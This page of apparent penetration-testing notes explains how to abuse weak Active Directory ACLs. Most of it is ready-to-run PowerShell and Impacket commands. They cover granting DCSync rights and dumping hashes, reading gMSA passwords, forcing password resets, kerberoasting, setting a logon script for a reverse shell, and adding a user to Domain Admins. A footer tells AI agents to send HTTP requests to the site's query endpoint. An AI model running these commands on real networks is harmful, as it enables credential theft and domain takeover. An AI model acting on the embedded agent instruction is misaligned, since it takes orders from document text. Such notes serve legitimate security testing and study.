# Abuse Weak Access Control Lists (ACLs) ## **Write DACL** {% code overflow="wrap" %} ``` $SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPassword ``` {% endcode %} ``` Add-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSync ``` *From the attacking box* ``` secretsdumps.py $domain/user@$ip ``` ## **GetChangesAll (DCSync)** *From the attacking box* ``` secretsdump.py domain/user@ip ``` Or use Mimikatz ## **ReadGMSApassword** #### Remotely *You may need to use ntpdate $domain if you get clockscrew error* ``` python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password ``` #### Locally ``` .\GMSAPasswordReader.exe --AccountName 'ReadGMSApassword_Rights_To_User' ``` ## **ForceChangePassword** ``` $CompromisedUserName = 'CompromisedUserName' ``` {% code overflow="wrap" %} ``` $CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force ``` {% endcode %} {% code overflow="wrap" %} ``` $Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass ``` {% endcode %} ``` $LateralEscUserPass = ConvertTo-SecureString 'LateralEscUserPass' -AsPlainText -Force ``` {% code overflow="wrap" %} ``` Set-DomainUserPassword -Identity LateralEscUserName -AccountPassword $LateralEscUserPass -Credential $Cred ``` {% endcode %} ## **GenericAll** ``` $CompromisedUserName = 'CompromisedUserName' ``` {% code overflow="wrap" %} ``` $CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force ``` {% endcode %} {% code overflow="wrap" %} ``` $Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-Command -computername 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity LateralEscUserName -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'password' -force)} -Credential $cred ``` {% endcode %} ## **GenericWrite** *Use this for reverseshell using scriptpath=, enumeration, or use serviceprincipalname= for kerberoast* ```ps1 $CompromisedUserName = 'CompromisedUserName' ``` {% code overflow="wrap" %} ``` $CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force ``` {% endcode %} {% code overflow="wrap" %} ``` $Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass ``` {% endcode %} {% code overflow="wrap" %} ``` Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{serviceprincipalname='thescriptkid/thescriptkid'} ``` {% endcode %} ``` Get-DomainSPNTicket -Credential $Cred LateralEscUserName | fl ``` #### OR {% code overflow="wrap" %} ``` Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{scriptpath='C:\\path\\to\\script.ps1'} ``` {% endcode %} ## **WriteOwner** ```ps1 $CompromisedUserName = 'CompromisedUserName' ``` {% code overflow="wrap" %} ``` $CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force ``` {% endcode %} {% code overflow="wrap" %} ``` $Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass ``` {% endcode %} {% code overflow="wrap" %} ``` Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity CompromisedUser ``` {% endcode %} {% code overflow="wrap" %} ``` Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity CompromisedUser -Rights All ``` {% endcode %} {% code overflow="wrap" %} ``` Add-DomainGroupMember -Identity 'Domain Admins' -Members 'CompromisedUser' -Credential $Cred ``` {% endcode %} ## Automation *Find ACLs of interest whether it be the current compromised user, or users found. start with current user.* {% code overflow="wrap" %} ``` Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.identityreferencename -like "*CompromisedUser*"} ``` {% endcode %} {% code overflow="wrap" %} ``` Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.identityreferenceclass -ne "computer"} ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://thescriptkid.gitbook.io/notes/windows-active-directory/abuse-weak-access-control-lists-acls.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.